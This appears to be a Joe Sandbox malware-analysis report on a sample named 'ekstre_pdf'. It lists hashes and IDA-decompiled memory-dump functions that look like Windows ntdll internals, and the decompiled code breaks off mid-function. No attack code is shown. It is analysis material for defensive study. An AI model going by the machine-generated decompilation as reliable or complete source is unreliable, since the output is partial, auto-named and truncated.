Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4357daf70b10fab350e8f933d8ad68f668f6284cca41b0d887e4a887665e2f8
Instruction ID: 3ffbe5eeb1e260eec54ddd003d3bd89116260b34f5388b253cb97aba07cac271
Opcode Fuzzy Hash: d4357daf70b10fab350e8f933d8ad68f668f6284cca41b0d887e4a887665e2f8
Instruction Fuzzy Hash: 1990022234100803D94071588554747000687E0645F51C456A4815515DC626C96976B5

Uniqueness

Uniqueness Score: -1.00%

Function 340A38D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc5dc6754d48b320f5f8eb230c9cf39863a94251c3dcc6b27b3636d5a51b20d6
Instruction ID: 92a71e311af233bf88deceb0fa70e732eb53c080fb875b71c02e2cd52ca311e1
Opcode Fuzzy Hash: bc5dc6754d48b320f5f8eb230c9cf39863a94251c3dcc6b27b3636d5a51b20d6
Instruction Fuzzy Hash: 6E90043334505103DD50715C4544757400577F0345F51C477F4C05555DC575CC5D7335

Uniqueness

Uniqueness Score: -1.00%

Function 340A29D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0294ab5bd18019ced9a56980e8a315b03f5b8caa3648eb832fd0481aebe8a3
Instruction ID: 0a0a75ccf947e96f29b55b04638f39b2f27ba082ab26ba90ede9a2a59a66ee8b
Opcode Fuzzy Hash: 2c0294ab5bd18019ced9a56980e8a315b03f5b8caa3648eb832fd0481aebe8a3
Instruction Fuzzy Hash: 819002A2301140938D00A2588544B4A450547F0245B51C45BE5845521CC535C855A139

Uniqueness

Uniqueness Score: -1.00%

Function 340A2A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95a34e62d86d5a436638dcad6004c975f17c3303094d517be8e5067d7c19986
Instruction ID: 8d3631be5ac92bd7bb2ace297c15b98281dc0d120f1055968c1e3c5808bf86a5
Opcode Fuzzy Hash: c95a34e62d86d5a436638dcad6004c975f17c3303094d517be8e5067d7c19986
Instruction Fuzzy Hash: 0E900226321000034945A558074454B044557E6395391C45AF5C07551CC631C8696325

Uniqueness

Uniqueness Score: -1.00%

Function 340A2AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e0ad45ce107a5dd76951aa1c3b0495c7886471e95ca4d3175b32d06e863f46d
Instruction ID: e72e46c4d15fa593b9a472e5ae8cdf5ac37833acc2ff4a07a8d91f3186c65ee5
Opcode Fuzzy Hash: 1e0ad45ce107a5dd76951aa1c3b0495c7886471e95ca4d3175b32d06e863f46d
Instruction Fuzzy Hash: 1D90023230100803D904615849446C6000547E0345F51C456AA815616ED675C8957135

Uniqueness

Uniqueness Score: -1.00%

Function 340A2AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c5169d4724a70a7a4c500fe19201d870020e4a97971c32b37f503e56dd41fc
Instruction ID: 6e4292e52b7bc93d2383d722fb78c95cd76561f27dbbe388c277765c06b34165
Opcode Fuzzy Hash: f6c5169d4724a70a7a4c500fe19201d870020e4a97971c32b37f503e56dd41fc
Instruction Fuzzy Hash: E390023270500803D95071584554786000547E0345F51C456A4815615DC765CA5976A5

Uniqueness

Uniqueness Score: -1.00%

Function 340A2B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8915c9ba20f26ccfe6868ce0f7b934d76a829792740a3dd38844784df20e0715
Instruction ID: afe48f54b042c0a88f1aec816a8d92aab86420a9e43e0df5849ad243409b46e6
Opcode Fuzzy Hash: 8915c9ba20f26ccfe6868ce0f7b934d76a829792740a3dd38844784df20e0715
Instruction Fuzzy Hash: 6790023230504843D94071584544A86001547E0349F51C456A4855655DD635CD59B665

Uniqueness

Uniqueness Score: -1.00%

Function 340A2B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74abe36a020f57860e3e41049fd16e7c7e3e2e5743de1dea46f885f3ee9f97c3
Instruction ID: 56b8cdd9ef1f0e2877400554da6f654723c7a3ec4f6e5baee73790026f22d405
Opcode Fuzzy Hash: 74abe36a020f57860e3e41049fd16e7c7e3e2e5743de1dea46f885f3ee9f97c3
Instruction Fuzzy Hash: 7C90023230100843D90061584544B86000547F0345F51C45BA4915615DC625C8557525

Uniqueness

Uniqueness Score: -1.00%

Function 340A2BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45f33b786be7a1a115a1cfdf1644bbccb23894e8ef45e53c18decbd733133361
Instruction ID: a96dbf22b727d07e59ed39949cb3ec8aba1eaa03bbc13adc69240d097850d608
Opcode Fuzzy Hash: 45f33b786be7a1a115a1cfdf1644bbccb23894e8ef45e53c18decbd733133361
Instruction Fuzzy Hash: BB90022270500403D94071585558746001547E0245F51D456A4815515DC669CA5976A5

Uniqueness

Uniqueness Score: -1.00%

Function 340A2B20 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 259eb1730cfe85b5acfac9a1813bd458aec4c873692e6cf4610775d0968b1ec1
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 3413A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3413A25D
RtlDebugPrintTimes.NTDLL ref: 3413A2F1
RtlDebugPrintTimes.NTDLL ref: 3413A314
RtlDebugPrintTimes.NTDLL ref: 3413A340
RtlDebugPrintTimes.NTDLL ref: 3413A415
RtlDebugPrintTimes.NTDLL ref: 3413A468
RtlDebugPrintTimes.NTDLL ref: 3413A487
RtlDebugPrintTimes.NTDLL ref: 3413A4B8

Strings

HEAP: , xrefs: 3413A206

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 3529ef071428da56af929e53775b8f66399222e3aa4ec402981eeb097f6ef9fc
Instruction ID: 712d714054f4acd660322a8aa215a8e9e476ea4bae8b131f342e93634c63d1f0
Opcode Fuzzy Hash: 3529ef071428da56af929e53775b8f66399222e3aa4ec402981eeb097f6ef9fc
Instruction Fuzzy Hash: 72A16875715B118FD704CE28C8D4A1ABBE9FB883A4F0945ADE945DB311EB30EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 34097550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E34097550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x3415b370 ^ _t107;
				_v8 =  *0x3415b370 ^ _t107;
				_t105 = __ecx;
				if( *0x34156664 == 0) {
					L5:
					return E340A4B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E3406E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E34097738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E3409763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E340A2B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E340976ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E340EEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E340A8F40( &_v548, 0, 0x214);
						_t106 =  *0x34156664;
						_t110 = _t108 + 0x20;
						 *0x341591e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x34156664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E340A4C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E340EEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E340AA9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E340EEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E340AA690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E340EEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E340DCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E340EEF10();
						goto L15;
					}
					L8:
					_t56 = E34097648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x34097560
0x34097562
0x3409756f
0x34097571
0x340975ab
0x340975b9
0x340975b9
0x34097579
0x34097583
0x3409758f
0x340d4443
0x34097595
0x3409759e
0x3409759e
0x340975a2
0x340975bc
0x340975c2
0x340975c7
0x340975c9
0x34097621
0x34097623
0x34097624
0x340975f8
0x340975ff
0x34097601
0x3409762c
0x34097603
0x34097609
0x34097610
0x34097612
0x34097612
0x34097612
0x34097614
0x34097616
0x34097630
0x34097633
0x34097633
0x34097618
0x3409761a
0x340d45c9
0x340d45c9
0x340d45d1
0x340d45d2
0x340d45d4
0x340d45d6
0x340d45d6
0x00000000
0x3409761a
0x340975ce
0x340975d4
0x340975da
0x340975df
0x340975e1
0x340d444a
0x340d4450
0x00000000
0x00000000
0x340d4456
0x340d4469
0x340d4476
0x340d4486
0x340d448b
0x340d4497
0x340d44b9
0x340d44bf
0x340d44c1
0x340d44c3
0x00000000
0x00000000
0x340d44c9
0x340d44cf
0x340d44d1
0x00000000
0x00000000
0x340d44dc
0x340d44de
0x00000000
0x00000000
0x340d44e6
0x340d44ed
0x340d44ef
0x340d45c4
0x00000000
0x340d45c4
0x340d44f7
0x340d44f8
0x340d4510
0x340d4515
0x340d4524
0x340d452b
0x340d452c
0x340d452e
0x340d4556
0x340d4561
0x340d4567
0x340d4569
0x340d456c
0x340d456e
0x340d4574
0x340d4576
0x00000000
0x00000000
0x00000000
0x00000000
0x340d457c
0x340d457c
0x340d4584
0x340d4588
0x340d458a
0x340d458c
0x340d458e
0x340d458e
0x340d459b
0x340d45a0
0x340d45a7
0x340d45ac
0x340d45ae
0x00000000
0x00000000
0x340d45b4
0x340d45b4
0x340d45b7
0x340d45b7
0x00000000
0x340d45bf
0x340d4530
0x340d4535
0x340d4537
0x340d4539
0x00000000
0x340d453e
0x340975e7
0x340975e9
0x340975ee
0x340975f0
0x00000000
0x00000000
0x340975f2
0x00000000
0x340975a4
0x340975a4
0x340975a4
0x00000000
0x340975a4

Strings

ExecuteOptions, xrefs: 340D44AB
CLIENT(ntdll): Processing section info %ws..., xrefs: 340D4592
Execute=1, xrefs: 340D451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 340D4460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 340D454D
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 340D4507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 340D4530

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 54eaec169aaa1b627c800ab0f6f1e5d4641ba7479af35de9db61551bf0e7d0c4
Instruction ID: 6aeaa2f739c45470ed4f86f35410bb263e8dbcbebbe66c149aaad3592fa17dba
Opcode Fuzzy Hash: 54eaec169aaa1b627c800ab0f6f1e5d4641ba7479af35de9db61551bf0e7d0c4
Instruction Fuzzy Hash: 16512472B00319FEFB50AAA5DD88FEE73E8EF08344F4005E9E505A71A1EB709A459F50

Uniqueness

Uniqueness Score: -1.00%

Function 3407A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E3407A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
				intOrPtr* _t130;
				intOrPtr _t135;
				void* _t136;
				intOrPtr _t145;
				intOrPtr _t151;
				intOrPtr* _t164;
				intOrPtr _t165;
				signed int _t166;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t176;
				signed int _t177;
				intOrPtr _t178;
				intOrPtr _t181;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t202;
				void* _t203;
				signed char _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				signed int _t219;
				signed int _t224;
				intOrPtr _t228;
				intOrPtr _t229;
				signed int _t234;
				void* _t236;
				signed int _t240;
				void* _t242;

				_t178 =  *[fs:0x18];
				_t242 = (_t240 & 0xfffffff8) - 0x3c;
				_t128 =  *((intOrPtr*)(_t178 + 0x30));
				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t129 = 0xc0150001;
						goto L33;
					}
				} else {
					L1:
					_v48 = 0;
					_v36 = 0xffffffff;
					_v40 = 0;
					if(_a16 == 0) {
						L83:
						_t129 = 0xc000000d;
						goto L33;
					} else {
						_t213 = _a4;
						if((_t213 & 0xfffffff8) != 0) {
							goto L83;
						} else {
							_t130 = _a20;
							if((_t213 & 0x00000007) == 0) {
								if(_t130 != 0) {
									goto L5;
								} else {
									goto L6;
								}
							} else {
								if(_t130 == 0) {
									goto L83;
								} else {
									L5:
									if( *_t130 < 0x24) {
										goto L83;
									} else {
										L6:
										if((_t213 & 0x00000002) == 0) {
											L9:
											if((_t213 & 0x00000004) != 0) {
												if(_t130 + 0x40 <=  *_t130 + _t130) {
													goto L10;
												} else {
													_push(0xc000000d);
													_push("RtlpFindActivationContextSection_CheckParameters");
													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
													goto L82;
												}
											} else {
												L10:
												_t233 = _a8;
												_v24 = _t213;
												_t214 =  *[fs:0x18];
												_v16 = _a12;
												_v12 = 0;
												_t172 = _v12;
												_t181 =  *((intOrPtr*)(_t214 + 0x30));
												_v28 = 0x18;
												_v8 = 0;
												_v20 = _a8;
												_v60 = 0;
												_v52 = _t214;
												_v44 = _t181;
												while(1) {
													_t135 = _t172;
													if(_t135 != 0) {
														goto L34;
													}
													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
													if(_t164 == 0) {
														L14:
														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
														_v60 = 0;
														if(_t228 == 0) {
															L36:
															_t228 =  *((intOrPtr*)(_t181 + 0x200));
															_v60 = 0xfffffffc;
															if(_t228 == 0) {
																L87:
																if(_t172 <= 3) {
																	goto L16;
																} else {
																	_t129 = 0xc00000e5;
																	goto L90;
																}
															} else {
																_t172 = 3;
																_v12 = 3;
																goto L16;
															}
														} else {
															_t172 = 2;
															_v12 = 2;
															goto L16;
														}
													} else {
														_t165 =  *_t164;
														if(_t165 != 0) {
															_t166 =  *((intOrPtr*)(_t165 + 4));
															_v60 = _t166;
															if(_t166 != 0) {
																if(_t166 == 0xfffffffc) {
																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
																	goto L56;
																} else {
																	if(_t166 == 0xfffffffd) {
																		_t228 = "Actx ";
																		goto L57;
																	} else {
																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
																		goto L56;
																	}
																}
															} else {
																L56:
																if(_t228 == 0) {
																	goto L14;
																} else {
																	L57:
																	_t172 = 1;
																	_v12 = 1;
																	L16:
																	if(_t228 == 0) {
																		_t129 = 0xc0150001;
																		L90:
																		_t234 = 0;
																		goto L91;
																	} else {
																		_t129 = E3407A600(_t228, _t233, _a12,  &_v56,  &_v48);
																		if(_t129 < 0) {
																			_t234 = 0;
																			if(_t129 != 0xc0150001 || _t172 == 3) {
																				goto L19;
																			} else {
																				_t181 = _v44;
																				_t214 = _v52;
																				_t233 = _a8;
																				continue;
																			}
																		} else {
																			_t224 = _v60;
																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
																			asm("sbb esi, esi");
																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
																			_t129 = 0;
																			L19:
																			if(_t129 < 0) {
																				L91:
																				if(_t129 < 0) {
																					goto L33;
																				} else {
																					goto L20;
																				}
																			} else {
																				L20:
																				_t173 = _v48;
																				if(_t173 < 0x2c) {
																					L110:
																					_t138 = _v56;
																					goto L111;
																				} else {
																					_t229 = _a20;
																					while(1) {
																						L22:
																						_t138 = _v56;
																						if( *_v56 != 0x64487353) {
																							break;
																						}
																						_t242 = _t242 - 8;
																						_t129 = E3407A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
																						if(_t129 >= 0) {
																							_t83 = _t234 - 1; // -1
																							if((_t83 | 0x00000007) != 0xffffffff) {
																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
																								_v40 = _t145;
																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
																									 *((char*)(_t242 + 0xf)) = 0;
																									 *0x341591e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
																									_v40();
																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
																									if( *((char*)(_t242 + 0xf)) != 0) {
																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
																									}
																								}
																							}
																							if(_t229 == 0) {
																								L67:
																								return 0;
																							} else {
																								_t129 = E34064428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
																								if(_t129 < 0) {
																									goto L33;
																								} else {
																									goto L67;
																								}
																							}
																						} else {
																							if(_t129 != 0xc0150008) {
																								L33:
																								return _t129;
																							} else {
																								_t217 =  *[fs:0x18];
																								_t234 = 0;
																								_v68 = 0;
																								_v40 = _t217;
																								_v60 = 0;
																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
																								_t176 = _v20;
																								L26:
																								while(1) {
																									if(_t176 <= 2) {
																										_t190 = _t176 - _t234;
																										if(_t190 == 0) {
																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
																											if(_t191 == 0) {
																												goto L68;
																											} else {
																												_t201 =  *_t191;
																												if(_t201 == 0) {
																													goto L68;
																												} else {
																													_t202 =  *((intOrPtr*)(_t201 + 4));
																													_v60 = _t202;
																													if(_t202 == 0) {
																														L102:
																														if(_t151 == 0) {
																															goto L68;
																														} else {
																															goto L103;
																														}
																													} else {
																														if(_t202 != 0xfffffffc) {
																															if(_t202 != 0xfffffffd) {
																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
																																goto L101;
																															} else {
																																_t151 = "Actx ";
																																_v68 = _t151;
																																L103:
																																_t176 = 1;
																																_v20 = 1;
																																goto L28;
																															}
																														} else {
																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
																															L101:
																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E3407A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
